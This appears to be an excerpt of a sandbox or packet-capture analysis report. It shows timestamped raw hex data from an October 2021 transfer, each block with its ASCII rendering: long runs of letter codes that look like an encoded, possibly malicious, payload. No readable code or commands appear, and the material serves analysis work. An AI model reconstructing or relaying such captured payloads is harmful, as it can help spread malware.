                                                                                                Data Ascii: g ig MT TTO O nS Oi Mi PU S MT pp Og p UP TT Ui UT nM MU PM TMS i nP TST OO MS Pi iT MM TMg UO TTO Op TU MP M MS Pg TTO p TTn P TTM Up pp Oi Pp pO OU UP nO TSM iP Tp gU iM TSg OT ni Un n MO nM TSO Oi UT Ug nS UO gU TTi Up US T Og Oi TMn Op gS PO g PS gM P
                                                                                                2021-10-26 15:35:17 UTC6976INData Raw: 53 55 20 67 20 70 55 20 69 67 20 4f 20 54 4d 53 20 70 6e 20 4f 4d 20 69 20 54 54 20 6e 20 67 53 20 67 55 20 4d 69 20 6e 20 54 4d 6e 20 54 4d 69 20 54 54 70 20 4d 54 20 67 55 20 54 55 20 55 53 20 6e 6e 20 50 53 20 54 4f 20 54 50 20 6e 54 20 50 54 20 70 55 20 70 55 20 67 4d 20 54 6e 20 54 53 53 20 55 4f 20 54 4d 67 20 70 70 20 54 53 67 20 50 50 20 6e 20 69 6e 20 4d 70 20 6e 54 20 54 54 67 20 4d 20 54 4d 53 20 54 53 4f 20 69 4d 20 6e 20 4d 70 20 6e 6e 20 54 50 20 69 55 20 54 6e 20 54 54 20 67 6e 20 54 70 20 50 6e 20 69 6e 20 50 6e 20 4f 67 20 54 4d 54 20 54 53 70 20 54 54 54 20 4d 70 20 4d 53 20 70 67 20 54 20 70 6e 20 6e 69 20 4f 20 54 4d 70 20 54 4d 70 20 67 6e 20 69 55 20 67 69 20 67 50 20 69 4f 20 54 50 20 54 67 20 50 53 20 4d 54 20 54 53 50 20 67 20 50
                                                                                                Data Ascii: SU g pU ig O TMS pn OM i TT n gS gU Mi n TMn TMi TTp MT gU TU US nn PS TO TP nT PT pU pU gM Tn TSS UO TMg pp TSg PP n in Mp nT TTg M TMS TSO iM n Mp nn TP iU Tn TT gn Tp Pn in Pn Og TMT TSp TTT Mp MS pg T pn ni O TMp TMp gn iU gi gP iO TP Tg PS MT TSP g P
                                                                                                2021-10-26 15:35:18 UTC6992INData Raw: 67 4f 20 54 20 4f 4f 20 6e 67 20 67 20 6e 54 20 4d 4f 20 6e 4f 20 54 54 6e 20 6e 55 20 6e 6e 20 70 6e 20 4f 67 20 54 53 4d 20 6e 55 20 54 4f 20 4d 6e 20 50 70 20 69 69 20 70 69 20 6e 20 4f 4d 20 54 53 4d 20 54 54 50 20 67 4d 20 4d 4f 20 67 6e 20 70 54 20 67 55 20 69 20 4f 55 20 54 54 70 20 54 4d 54 20 70 54 20 4d 70 20 70 50 20 69 54 20 69 54 20 4f 6e 20 53 20 6e 54 20 6e 55 20 67 55 20 54 53 20 67 6e 20 67 69 20 70 55 20 70 55 20 54 54 67 20 67 20 54 4d 70 20 54 53 4d 20 4d 69 20 70 6e 20 50 70 20 6e 6e 20 50 53 20 54 4f 20 54 50 20 6e 54 20 4f 6e 20 4d 54 20 6e 20 70 54 20 6e 20 55 50 20 54 54 6e 20 6e 54 20 70 55 20 6e 20 4d 55 20 70 6e 20 67 55 20 50 20 6e 53 20 54 53 4d 20 54 4d 70 20 54 53 54 20 4f 6e 20 69 50 20 4d 70 20 70 54 20 50 54 20 4f 69 20
                                                                                                Data Ascii: gO T OO ng g nT MO nO TTn nU nn pn Og TSM nU TO Mn Pp ii pi n OM TSM TTP gM MO gn pT gU i OU TTp TMT pT Mp pP iT iT On S nT nU gU TS gn gi pU pU TTg g TMp TSM Mi pn Pp nn PS TO TP nT On MT n pT n UP TTn nT pU n MU pn gU P nS TSM TMp TST On iP Mp pT PT Oi
                                                                                                2021-10-26 15:35:18 UTC7008INData Raw: 67 20 69 20 4d 69 20 50 69 20 54 4d 6e 20 55 4f 20 6e 20 4f 6e 20 50 67 20 55 70 20 4d 20 55 50 20 54 6e 20 54 4d 69 20 4f 20 54 54 6e 20 54 54 67 20 50 70 20 70 53 20 70 50 20 67 6e 20 70 50 20 4f 4f 20 54 67 20 54 50 20 50 69 20 54 54 4f 20 6e 4f 20 69 20 55 20 70 69 20 4f 50 20 54 53 50 20 4d 4d 20 54 53 53 20 54 54 20 53 20 50 50 20 67 53 20 67 4d 20 54 4d 67 20 54 53 70 20 54 53 69 20 70 69 20 54 53 67 20 4d 70 20 67 6e 20 67 67 20 67 50 20 70 20 55 6e 20 54 50 20 54 54 20 55 69 20 55 54 20 6e 4d 20 4d 55 20 70 50 20 53 20 4f 69 20 67 20 54 20 54 53 53 20 6e 53 20 50 50 20 69 4d 20 55 20 4f 54 20 54 53 53 20 54 54 20 54 54 4f 20 50 4f 20 70 54 20 4d 70 20 50 6e 20 70 4d 20 70 6e 20 4f 50 20 55 50 20 54 54 20 54 53 50 20 54 54 69 20 55 70 20 55 53 20
                                                                                                Data Ascii: g i Mi Pi TMn UO n On Pg Up M UP Tn TMi O TTn TTg Pp pS pP gn pP OO Tg TP Pi TTO nO i U pi OP TSP MM TSS TT S PP gS gM TMg TSp TSi pi TSg Mp gn gg gP p Un TP TT Ui UT nM MU pP S Oi g T TSS nS PP iM U OT TSS TT TTO PO pT Mp Pn pM pn OP UP TT TSP TTi Up US
                                                                                                2021-10-26 15:35:18 UTC7024INData Raw: 20 54 50 20 69 55 20 54 6e 20 54 54 20 67 6e 20 4d 70 20 70 50 20 4f 50 20 54 20 54 53 6e 20 70 4f 20 4f 69 20 4d 20 70 53 20 4d 69 20 55 54 20 54 4d 20 54 6e 20 6e 20 4f 67 20 4f 69 20 70 6e 20 50 67 20 4d 4d 20 67 20 67 67 20 69 4f 20 54 50 20 54 67 20 50 53 20 4d 54 20 54 53 50 20 67 20 4d 4f 20 4d 70 20 4f 20 54 4d 69 20 55 54 20 54 53 4f 20 4f 53 20 70 53 20 70 20 53 20 4d 20 4f 20 6e 54 20 54 4d 4d 20 54 4d 54 20 67 20 70 4d 20 70 50 20 50 50 20 54 69 20 50 69 20 70 20 6e 4d 20 6e 54 20 67 20 50 53 20 69 67 20 70 69 20 50 67 20 4d 69 20 54 54 70 20 4f 4d 20 55 50 20 6e 70 20 70 67 20 70 67 20 70 55 20 69 70 20 4d 67 20 6e 50 20 70 20 54 4d 67 20 54 54 4f 20 54 53 50 20 54 54 69 20 55 70 20 55 53 20 54 20 54 53 6e 20 55 4f 20 54 53 70 20 4f 70 20 50
                                                                                                Data Ascii: TP iU Tn TT gn Mp pP OP T TSn pO Oi M pS Mi UT TM Tn n Og Oi pn Pg MM g gg iO TP Tg PS MT TSP g MO Mp O TMi UT TSO OS pS p S M O nT TMM TMT g pM pP PP Ti Pi p nM nT g PS ig pi Pg Mi TTp OM UP np pg pg pU ip Mg nP p TMg TTO TSP TTi Up US T TSn UO TSp Op P
                                                                                                2021-10-26 15:35:18 UTC7040INData Raw: 67 4f 20 4f 6e 20 4f 54 20 50 20 55 4d 20 50 4f 20 6e 69 20 67 50 20 50 4f 20 69 20 4f 53 20 55 6e 20 54 50 20 54 54 20 55 69 20 55 54 20 6e 4d 20 4d 55 20 70 53 20 54 53 4f 20 4f 6e 20 54 53 4f 20 54 53 53 20 69 55 20 67 4f 20 4d 69 20 50 53 20 6e 20 54 4d 53 20 6e 20 54 53 53 20 55 67 20 4d 20 50 20 67 4d 20 4d 55 20 67 69 20 54 53 70 20 55 4d 20 54 54 50 20 54 54 20 54 53 50 20 54 54 69 20 55 70 20 55 53 20 54 20 54 54 6e 20 4f 53 20 70 70 20 70 20 4d 20 54 70 20 70 6e 20 55 20 4d 4d 20 54 4d 50 20 54 4d 70 20 70 4f 20 54 54 4f 20 4d 70 20 4d 50 20 4d 4d 20 67 55 20 4d 20 54 4d 6e 20 54 53 53 20 55 4f 20 54 4d 6e 20 4d 4d 20 54 53 20 70 67 20 4d 6e 20 4d 20 54 54 20 54 54 67 20 4f 69 20 55 67 20 54 55 20 4d 53 20 70 67 20 67 54 20 4d 50 20 6e 54 20 55
                                                                                                Data Ascii: gO On OT P UM PO ni gP PO i OS Un TP TT Ui UT nM MU pS TSO On TSO TSS iU gO Mi PS n TMS n TSS Ug M P gM MU gi TSp UM TTP TT TSP TTi Up US T TTn OS pp p M Tp pn U MM TMP TMp pO TTO Mp MP MM gU M TMn TSS UO TMn MM TS pg Mn M TT TTg Oi Ug TU MS pg gT MP nT U
                                                                                                2021-10-26 15:35:18 UTC7056INData Raw: 53 20 67 69 20 54 55 20 55 53 20 6e 6e 20 50 53 20 54 4f 20 54 50 20 6e 54 20 69 50 20 54 53 20 50 20 54 54 20 67 54 20 4f 69 20 54 4d 69 20 54 53 67 20 4f 69 20 4d 50 20 69 20 50 54 20 50 6e 20 50 4d 20 54 54 4f 20 4d 20 4f 53 20 54 53 50 20 67 4f 20 54 54 20 67 20 70 53 20 6e 6e 20 54 50 20 69 55 20 54 6e 20 54 54 20 67 6e 20 70 54 20 70 4d 20 70 4d 20 4d 4f 20 54 53 6e 20 54 54 6e 20 70 20 54 20 69 20 70 69 20 54 50 20 6e 67 20 67 6e 20 54 53 70 20 70 50 20 54 54 6e 20 54 54 50 20 53 20 67 53 20 4d 6e 20 54 54 20 4d 67 20 54 50 20 54 67 20 50 53 20 4d 54 20 54 53 50 20 67 20 4d 53 20 54 54 20 54 53 20 4f 4f 20 55 67 20 54 4d 6e 20 54 54 6e 20 67 54 20 70 70 20 54 70 20 50 4f 20 67 50 20 55 54 20 70 55 20 54 4d 67 20 70 20 4d 4f 20 54 6e 20 69 4f 20 4f
                                                                                                Data Ascii: S gi TU US nn PS TO TP nT iP TS P TT gT Oi TMi TSg Oi MP i PT Pn PM TTO M OS TSP gO TT g pS nn TP iU Tn TT gn pT pM pM MO TSn TTn p T i pi TP ng gn TSp pP TTn TTP S gS Mn TT Mg TP Tg PS MT TSP g MS TT TS OO Ug TMn TTn gT pp Tp PO gP UT pU TMg p MO Tn iO O
                                                                                                2021-10-26 15:35:18 UTC7072INData Raw: 6e 20 55 6e 20 70 70 20 54 54 20 50 6e 20 54 70 20 4d 53 20 54 54 4d 20 54 54 67 20 70 70 20 55 6e 20 55 6e 20 67 4d 20 4d 67 20 69 4f 20 55 20 54 4f 20 70 69 20 6e 67 20 70 70 20 70 70 20 50 4f 20 53 20 54 54 6e 20 50 6e 20 4d 20 55 67 20 4f 69 20 70 50 20 55 53 20 50 4f 20 53 20 4d 69 20 69 67 20 4d 50 20 4f 4d 20 55 54 20 4f 69 20 54 54 70 20 50 70 20 4d 4f 20 4d 4d 20 70 20 54 54 4d 20 70 50 20 55 50 20 6e 53 20 54 53 50 20 4d 54 20 6e 20 54 20 4d 20 50 69 20 4f 69 20 70 4f 20 70 50 20 4f 69 20 55 69 20 67 67 20 4d 50 20 55 20 4d 54 20 70 70 20 69 55 20 55 50 20 55 67 20 67 4d 20 69 50 20 69 55 20 4d 54 20 4d 54 20 55 54 20 70 4f 20 6e 53 20 55 6e 20 50 69 20 67 53 20 54 70 20 70 54 20 54 6e 20 6e 53 20 55 55 20 50 53 20 55 54 20 69 4f 20 70 20 69 4d
                                                                                                Data Ascii: n Un pp TT Pn Tp MS TTM TTg pp Un Un gM Mg iO U TO pi ng pp pp PO S TTn Pn M Ug Oi pP US PO S Mi ig MP OM UT Oi TTp Pp MO MM p TTM pP UP nS TSP MT n T M Pi Oi pO pP Oi Ui gg MP U MT pp iU UP Ug gM iP iU MT MT UT pO nS Un Pi gS Tp pT Tn nS UU PS UT iO p iM
                                                                                                2021-10-26 15:35:18 UTC7088INData Raw: 67 6e 20 67 50 20 54 55 4d 20 4d 69 4f 20 54 54 50 20 54 53 53 20 4d 67 70 20 55 54 20 67 70 20 50 50 20 50 67 20 50 70 20 6e 67 20 54 54 4f 20 4f 70 20 54 4d 6e 20 4d 69 53 20 54 50 50 20 69 4f 20 69 70 20 67 4f 20 4d 54 67 20 55 67 20 54 53 67 20 4d 67 70 20 54 53 50 20 50 55 20 69 50 20 67 50 20 54 55 67 20 54 54 6e 20 54 54 70 20 54 54 6e 20 54 54 54 20 54 54 67 20 70 53 20 69 50 20 50 50 20 67 50 20 55 67 20 54 4d 53 20 54 4d 67 20 54 54 4d 20 54 54 6e 20 67 50 20 54 6e 70 20 4d 50 54 20 69 67 20 6e 4d 20 54 4d 4d 20 54 53 53 20 69 50 20 4f 55 20 54 6e 4f 20 69 54 20 50 55 20 67 4f 20 4d 53 20 4f 4f 20 50 67 20 54 53 53 20 54 54 4d 20 69 55 20 50 70 20 67 50 20 54 55 4d 20 54 50 6e 20 4f 4f 20 4d 69 50 20 54 70 69 20 54 53 67 20 50 67 20 50 69 20 70
                                                                                                Data Ascii: gn gP TUM MiO TTP TSS Mgp UT gp PP Pg Pp ng TTO Op TMn MiS TPP iO ip gO MTg Ug TSg Mgp TSP PU iP gP TUg TTn TTp TTn TTT TTg pS iP PP gP Ug TMS TMg TTM TTn gP Tnp MPT ig nM TMM TSS iP OU TnO iT PU gO MS OO Pg TSS TTM iU Pp gP TUM TPn OO MiP Tpi TSg Pg Pi p
                                                                                                2021-10-26 15:35:18 UTC7104INData Raw: 54 69 50 20 54 55 4f 20 4d 54 4f 20 69 6e 20 54 6e 70 20 70 6e 20 4d 50 67 20 4d 53 6e 20 54 50 70 20 4d 53 4f 20 54 54 69 20 69 4d 20 4d 6e 20 55 70 20 70 67 20 4d 54 53 20 69 20 4d 69 67 20 54 4d 6e 20 4d 54 50 20 54 4d 53 20 54 53 53 20 54 53 53 20 54 6e 53 20 54 4d 6e 20 67 54 20 54 4f 20 55 54 20 4d 50 50 20 50 20 70 50 20 54 70 4f 20 54 6e 4d 20 54 55 4d 20 6e 54 20 4f 53 20 54 69 55 20 54 6e 54 20 4f 50 20 4d 53 55 20 4d 6e 20 55 55 20 54 70 67 20 54 4f 70 20 4d 50 20 4d 67 53 20 4d 53 70 20 4d 54 55 20 54 4d 67 20 54 70 70 20 55 55 20 50 4d 20 69 54 20 54 55 4d 20 54 70 20 54 70 53 20 54 67 69 20 54 69 69 20 69 70 20 54 70 6e 20 67 4d 20 69 20 54 69 55 20 4d 69 53 20 50 6e 20 67 67 20 70 70 20 6e 6e 20 54 53 4d 20 4d 4d 20 4d 67 50 20 4d 53 67 20
                                                                                                Data Ascii: TiP TUO MTO in Tnp pn MPg MSn TPp MSO TTi iM Mn Up pg MTS i Mig TMn MTP TMS TSS TSS TnS TMn gT TO UT MPP P pP TpO TnM TUM nT OS TiU TnT OP MSU Mn UU Tpg TOp MP MgS MSp MTU TMg Tpp UU PM iT TUM Tp TpS Tgi Tii ip Tpn gM i TiU MiS Pn gg pp nn TSM MM MgP MSg
                                                                                                2021-10-26 15:35:18 UTC7120INData Raw: 20 4d 4d 54 20 50 69 20 54 70 70 20 67 50 20 4d 4d 53 20 54 54 20 67 6e 20 67 4f 20 69 6e 20 70 50 20 4d 4d 54 20 67 20 54 4d 53 20 4d 50 53 20 4d 4d 69 20 54 55 50 20 50 69 20 70 67 20 4d 4d 53 20 70 4d 20 4d 4f 20 54 67 20 54 53 6e 20 4d 69 54 20 4d 53 55 20 54 4d 4d 20 55 53 20 54 53 55 20 55 67 20 54 50 4d 20 4d 67 4f 20 50 70 20 54 50 6e 20 54 6e 54 20 4d 69 4d 20 4d 67 54 20 67 4f 20 54 54 53 20 4d 4d 6e 20 54 6e 4f 20 54 55 55 20 54 55 20 54 50 53 20 54 70 4f 20 4d 53 50 20 54 67 67 20 54 54 67 20 4d 55 20 4d 53 4d 20 4d 67 70 20 54 70 55 20 50 50 20 4d 53 4d 20 4d 4d 67 20 54 50 53 20 55 53 20 4f 54 20 55 55 20 70 6e 20 50 70 20 4d 53 50 20 54 50 20 54 67 70 20 69 54 20 54 69 55 20 54 67 53 20 54 69 4d 20 54 55 53 20 54 55 4d 20 4d 69 20 54 6e 69
                                                                                                Data Ascii: MMT Pi Tpp gP MMS TT gn gO in pP MMT g TMS MPS MMi TUP Pi pg MMS pM MO Tg TSn MiT MSU TMM US TSU Ug TPM MgO Pp TPn TnT MiM MgT gO TTS MMn TnO TUU TU TPS TpO MSP Tgg TTg MU MSM Mgp TpU PP MSM MMg TPS US OT UU pn Pp MSP TP Tgp iT TiU TgS TiM TUS TUM Mi Tni
                                                                                                2021-10-26 15:35:18 UTC7136INData Raw: 20 54 6e 67 20 54 70 69 20 4d 53 69 20 69 4f 20 6e 4d 20 70 4f 20 54 67 69 20 69 4f 20 55 53 20 54 67 4d 20 70 20 70 4d 20 54 50 54 20 4d 53 69 20 54 6e 4f 20 54 70 4d 20 67 70 20 70 69 20 55 69 20 6e 4f 20 6e 55 20 54 50 53 20 54 53 67 20 54 53 70 20 4d 53 67 20 4d 4d 4f 20 67 67 20 69 4f 20 6e 20 50 70 20 54 67 55 20 54 50 67 20 4d 54 54 20 54 6e 55 20 4f 70 20 55 4d 20 54 4f 4d 20 54 6e 53 20 6e 69 20 4d 69 53 20 50 53 20 69 4f 20 54 50 54 20 4d 54 69 20 54 20 4d 50 69 20 54 4d 54 20 4d 67 69 20 70 69 20 4f 69 20 54 70 55 20 50 6e 20 67 6e 20 69 55 20 54 55 4d 20 54 4d 6e 20 4d 50 67 20 54 55 20 4d 53 69 20 55 50 20 54 20 54 53 55 20 4d 4d 4f 20 54 54 50 20 54 4f 53 20 54 55 50 20 50 6e 20 4d 50 20 4d 67 67 20 54 4f 67 20 54 69 6e 20 4d 4d 67 20 54 70
                                                                                                Data Ascii: Tng Tpi MSi iO nM pO Tgi iO US TgM p pM TPT MSi TnO TpM gp pi Ui nO nU TPS TSg TSp MSg MMO gg iO n Pp TgU TPg MTT TnU Op UM TOM TnS ni MiS PS iO TPT MTi T MPi TMT Mgi pi Oi TpU Pn gn iU TUM TMn MPg TU MSi UP T TSU MMO TTP TOS TUP Pn MP Mgg TOg Tin MMg Tp
                                                                                                2021-10-26 15:35:18 UTC7152INData Raw: 55 4d 20 4d 53 70 20 54 53 67 20 4d 50 50 20 4d 53 67 20 67 20 54 50 50 20 54 69 67 20 4d 67 67 20 67 53 20 54 55 69 20 54 6e 6e 20 67 70 20 54 54 6e 20 54 6e 4f 20 54 4f 6e 20 4d 4d 6e 20 54 4d 54 20 69 50 20 54 67 70 20 54 53 67 20 54 69 54 20 69 6e 20 4d 4f 20 54 55 69 20 54 70 20 54 67 67 20 4d 6e 20 67 6e 20 4d 50 67 20 69 6e 20 4d 55 20 4d 54 50 20 54 4d 6e 20 54 67 69 20 54 55 67 20 4f 53 20 54 4f 67 20 4d 67 70 20 54 4f 70 20 50 55 20 54 50 53 20 6e 6e 20 54 50 4f 20 4d 69 20 54 54 69 20 54 50 53 20 55 69 20 55 20 54 50 54 20 4f 55 20 4d 67 55 20 54 55 4d 20 55 54 20 4d 69 54 20 54 53 20 54 53 6e 20 55 67 20 54 4f 4f 20 54 53 4d 20 54 20 69 54 20 54 55 55 20 54 67 70 20 4d 69 54 20 54 54 54 20 4d 4d 20 4d 67 55 20 54 67 54 20 4d 50 50 20 54 54 6e
                                                                                                Data Ascii: UM MSp TSg MPP MSg g TPP Tig Mgg gS TUi Tnn gp TTn TnO TOn MMn TMT iP Tgp TSg TiT in MO TUi Tp Tgg Mn gn MPg in MU MTP TMn Tgi TUg OS TOg Mgp TOp PU TPS nn TPO Mi TTi TPS Ui U TPT OU MgU TUM UT MiT TS TSn Ug TOO TSM T iT TUU Tgp MiT TTT MM MgU TgT MPP TTn
                                                                                                2021-10-26 15:35:18 UTC7168INData Raw: 4d 50 20 54 50 20 54 4f 69 20 4d 4d 54 20 4d 54 70 20 4f 69 20 4d 53 6e 20 54 50 70 20 54 6e 67 20 6e 69 20 4d 4d 54 20 4d 4d 20 4d 6e 20 67 50 20 4f 69 20 54 4d 6e 20 54 70 67 20 67 54 20 54 4f 55 20 4d 67 69 20 4d 53 53 20 69 50 20 4d 53 54 20 54 50 6e 20 54 4f 67 20 54 69 6e 20 4d 67 50 20 69 4d 20 4d 4d 4f 20 54 6e 69 20 54 55 55 20 67 55 20 6e 50 20 54 54 4f 20 54 67 4d 20 54 54 69 20 54 50 6e 20 54 54 70 20 4d 50 4d 20 54 55 70 20 6e 54 20 54 70 4f 20 4d 4d 54 20 54 4f 20 50 50 20 4d 50 54 20 54 55 69 20 4d 6e 20 54 69 54 20 4f 69 20 54 54 67 20 54 50 4f 20 54 67 54 20 67 53 20 54 4f 67 20 54 53 50 20 4d 50 69 20 55 4d 20 54 4d 70 20 4d 4d 55 20 69 50 20 54 6e 69 20 6e 4d 20 4d 67 20 54 53 70 20 54 67 53 20 54 70 4f 20 4d 4d 54 20 54 67 53 20 4d 53
                                                                                                Data Ascii: MP TP TOi MMT MTp Oi MSn TPp Tng ni MMT MM Mn gP Oi TMn Tpg gT TOU Mgi MSS iP MST TPn TOg Tin MgP iM MMO Tni TUU gU nP TTO TgM TTi TPn TTp MPM TUp nT TpO MMT TO PP MPT TUi Mn TiT Oi TTg TPO TgT gS TOg TSP MPi UM TMp MMU iP Tni nM Mg TSp TgS TpO MMT TgS MS
                                                                                                2021-10-26 15:35:18 UTC7184INData Raw: 20 6e 4d 20 70 4d 20 50 70 20 4d 50 20 54 6e 69 20 4d 4d 69 20 69 54 20 4d 50 54 20 54 4d 50 20 50 69 20 67 4f 20 54 53 55 20 4d 4d 67 20 54 6e 54 20 4d 4d 67 20 54 4d 54 20 67 54 20 54 53 55 20 54 53 67 20 54 54 69 20 54 67 53 20 4d 67 54 20 54 4f 54 20 4d 53 55 20 50 69 20 54 69 70 20 54 4f 53 20 54 53 6e 20 6e 20 4d 50 4d 20 54 50 54 20 54 69 54 20 54 69 54 20 54 67 50 20 69 6e 20 4d 69 50 20 54 54 4d 20 54 4d 67 20 54 50 55 20 6e 69 20 55 67 20 54 69 50 20 50 69 20 50 53 20 54 6e 69 20 54 67 53 20 4d 50 53 20 54 67 50 20 4d 53 53 20 54 55 69 20 54 4d 4d 20 4d 67 55 20 4d 53 69 20 70 55 20 54 55 70 20 69 50 20 54 69 20 4d 67 4f 20 70 67 20 70 54 20 4f 6e 20 54 53 67 20 4d 69 55 20 54 50 4f 20 70 70 20 54 6e 69 20 54 4f 6e 20 54 50 70 20 54 54 4d 20 4f
                                                                                                Data Ascii: nM pM Pp MP Tni MMi iT MPT TMP Pi gO TSU MMg TnT MMg TMT gT TSU TSg TTi TgS MgT TOT MSU Pi Tip TOS TSn n MPM TPT TiT TiT TgP in MiP TTM TMg TPU ni Ug TiP Pi PS Tni TgS MPS TgP MSS TUi TMM MgU MSi pU TUp iP Ti MgO pg pT On TSg MiU TPO pp Tni TOn TPp TTM O
                                                                                                2021-10-26 15:35:18 UTC7200INData Raw: 20 4f 70 20 4d 53 4f 20 54 67 4d 20 54 4d 55 20 50 50 20 4f 70 20 54 69 4d 20 54 4d 4f 20 6e 55 20 4d 4d 50 20 70 6e 20 55 55 20 54 55 54 20 4f 6e 20 54 55 20 4d 4d 70 20 4d 20 4d 67 55 20 4d 54 4f 20 54 50 53 20 67 4d 20 69 67 20 54 69 55 20 54 4d 69 20 54 70 50 20 67 55 20 70 20 6e 4f 20 4d 53 20 54 4d 50 20 4d 53 6e 20 4f 69 20 54 20 4f 53 20 54 70 50 20 54 4f 4f 20 54 69 53 20 6e 20 54 50 20 67 6e 20 54 6e 4d 20 70 4d 20 4d 53 54 20 54 4d 55 20 54 4d 69 20 50 6e 20 54 4f 4f 20 54 69 69 20 54 70 6e 20 54 54 20 6e 20 6e 6e 20 55 4d 20 4d 4d 55 20 69 4d 20 6e 67 20 50 54 20 4d 53 50 20 4d 50 53 20 54 55 50 20 54 50 55 20 54 55 67 20 4d 53 67 20 4d 67 4d 20 6e 67 20 69 20 54 67 20 4f 4f 20 4f 55 20 54 67 4f 20 50 4d 20 4d 53 69 20 55 55 20 70 50 20 54 67
                                                                                                Data Ascii: Op MSO TgM TMU PP Op TiM TMO nU MMP pn UU TUT On TU MMp M MgU MTO TPS gM ig TiU TMi TpP gU p nO MS TMP MSn Oi T OS TpP TOO TiS n TP gn TnM pM MST TMU TMi Pn TOO Tii Tpn TT n nn UM MMU iM ng PT MSP MPS TUP TPU TUg MSg MgM ng i Tg OO OU TgO PM MSi UU pP Tg
                                                                                                2021-10-26 15:35:18 UTC7216INData Raw: 50 20 54 4f 54 20 4f 55 20 4d 53 50 20 70 50 20 54 4f 50 20 54 54 54 20 4f 4d 20 4d 50 54 20 54 4d 50 20 54 69 20 67 55 20 4f 4d 20 54 67 55 20 50 20 4d 69 70 20 54 4d 67 20 54 67 70 20 53 20 54 67 67 20 54 53 50 20 4d 69 4d 20 69 6e 20 54 55 69 20 69 69 20 54 54 67 20 54 70 50 20 50 20 69 67 20 70 4f 20 54 50 50 20 4d 69 67 20 54 50 20 4d 69 67 20 54 70 67 20 54 50 67 20 6e 20 54 53 53 20 4d 53 69 20 54 70 4d 20 54 50 55 20 67 55 20 67 20 69 4f 20 67 69 20 6e 4d 20 67 55 20 54 53 20 54 69 70 20 54 4d 20 50 55 20 54 6e 50 20 4d 53 69 20 54 70 54 20 67 53 20 54 70 20 55 70 20 67 20 67 67 20 4f 20 54 4d 70 20 4d 53 55 20 50 54 20 4d 4d 70 20 6e 70 20 4d 53 4d 20 6e 4f 20 4d 50 53 20 54 69 54 20 4d 50 54 20 54 53 53 20 54 70 6e 20 4d 69 4f 20 55 50 20 54 50
                                                                                                Data Ascii: P TOT OU MSP pP TOP TTT OM MPT TMP Ti gU OM TgU P Mip TMg Tgp S Tgg TSP MiM in TUi ii TTg TpP P ig pO TPP Mig TP Mig Tpg TPg n TSS MSi TpM TPU gU g iO gi nM gU TS Tip TM PU TnP MSi TpT gS Tp Up g gg O TMp MSU PT MMp np MSM nO MPS TiT MPT TSS Tpn MiO UP TP
                                                                                                2021-10-26 15:35:18 UTC7232INData Raw: 55 20 4d 50 50 20 54 54 70 20 4f 69 20 4d 6e 20 54 70 55 20 69 69 20 54 53 50 20 50 55 20 70 50 20 54 55 54 20 54 50 53 20 4d 50 53 20 4d 69 50 20 54 4d 70 20 54 70 6e 20 54 4d 6e 20 54 70 20 55 20 54 50 69 20 54 4f 4d 20 54 69 50 20 4d 67 67 20 4f 6e 20 54 70 69 20 55 4f 20 50 55 20 4d 50 67 20 54 4f 53 20 67 67 20 69 67 20 6e 70 20 54 54 54 20 4d 54 54 20 54 20 67 53 20 4d 4d 4d 20 70 69 20 4d 67 69 20 54 4f 6e 20 4d 53 70 20 54 54 6e 20 6e 55 20 4d 54 54 20 54 54 53 20 4d 67 70 20 69 6e 20 67 6e 20 54 6e 67 20 4d 53 69 20 54 54 4f 20 54 70 67 20 54 67 50 20 54 50 69 20 4d 69 70 20 54 53 50 20 6e 55 20 54 55 67 20 54 55 50 20 54 4d 6e 20 4d 54 55 20 4d 55 20 55 67 20 6e 55 20 55 4f 20 69 4f 20 54 70 69 20 6e 55 20 4d 67 55 20 54 4f 50 20 54 6e 6e 20 54
                                                                                                Data Ascii: U MPP TTp Oi Mn TpU ii TSP PU pP TUT TPS MPS MiP TMp Tpn TMn Tp U TPi TOM TiP Mgg On Tpi UO PU MPg TOS gg ig np TTT MTT T gS MMM pi Mgi TOn MSp TTn nU MTT TTS Mgp in gn Tng MSi TTO Tpg TgP TPi Mip TSP nU TUg TUP TMn MTU MU Ug nU UO iO Tpi nU MgU TOP Tnn T
                                                                                                2021-10-26 15:35:18 UTC7248INData Raw: 54 70 20 54 70 69 20 69 70 20 4d 50 50 20 4d 53 55 20 4d 53 70 20 6e 20 69 50 20 50 4d 20 54 69 70 20 4d 69 50 20 54 6e 50 20 4d 70 20 50 4d 20 54 50 55 20 54 4d 4f 20 6e 4d 20 6e 54 20 6e 4d 20 54 70 54 20 54 6e 53 20 4d 69 50 20 54 53 55 20 67 4f 20 70 20 54 69 67 20 54 55 69 20 50 4d 20 54 54 50 20 70 6e 20 4d 4d 50 20 67 67 20 54 6e 6e 20 4d 54 4d 20 54 55 50 20 55 69 20 6e 20 67 50 20 70 6e 20 50 55 20 4d 50 67 20 53 20 67 70 20 69 4f 20 54 50 67 20 55 6e 20 4d 54 50 20 54 50 54 20 54 55 4f 20 70 4d 20 69 54 20 54 4d 6e 20 54 6e 67 20 4d 4d 53 20 50 70 20 69 54 20 67 67 20 54 54 70 20 54 6e 70 20 50 69 20 4d 67 50 20 70 54 20 4d 54 50 20 50 69 20 6e 50 20 67 4f 20 54 54 69 20 54 70 20 54 55 20 54 53 54 20 50 53 20 54 70 20 67 55 20 4d 54 20 54 70 50
                                                                                                Data Ascii: Tp Tpi ip MPP MSU MSp n iP PM Tip MiP TnP Mp PM TPU TMO nM nT nM TpT TnS MiP TSU gO p Tig TUi PM TTP pn MMP gg Tnn MTM TUP Ui n gP pn PU MPg S gp iO TPg Un MTP TPT TUO pM iT TMn Tng MMS Pp iT gg TTp Tnp Pi MgP pT MTP Pi nP gO TTi Tp TU TST PS Tp gU MT TpP
                                                                                                2021-10-26 15:35:18 UTC7264INData Raw: 20 54 50 4f 20 54 6e 20 55 54 20 54 67 6e 20 4d 69 54 20 54 70 67 20 54 67 4f 20 54 67 53 20 4f 69 20 4d 54 70 20 4d 50 50 20 54 55 50 20 4d 67 55 20 54 4f 20 70 70 20 4d 54 55 20 50 50 20 54 67 70 20 50 54 20 67 20 4d 20 6e 4f 20 54 69 69 20 67 67 20 54 50 20 4d 69 4d 20 4d 67 67 20 50 6e 20 4d 67 53 20 54 67 54 20 4d 54 55 20 54 4f 70 20 54 53 55 20 50 54 20 4d 67 50 20 4d 4d 6e 20 50 67 20 54 69 50 20 54 67 67 20 69 50 20 4f 53 20 4d 53 67 20 4d 50 69 20 4f 6e 20 54 4f 69 20 54 69 4d 20 54 53 53 20 54 53 54 20 54 67 67 20 70 70 20 54 54 4d 20 70 4f 20 4d 67 4f 20 54 55 53 20 70 54 20 55 4d 20 54 53 70 20 4d 4d 67 20 70 70 20 54 69 55 20 54 67 70 20 54 4f 6e 20 54 54 20 6e 55 20 4d 54 67 20 54 69 69 20 50 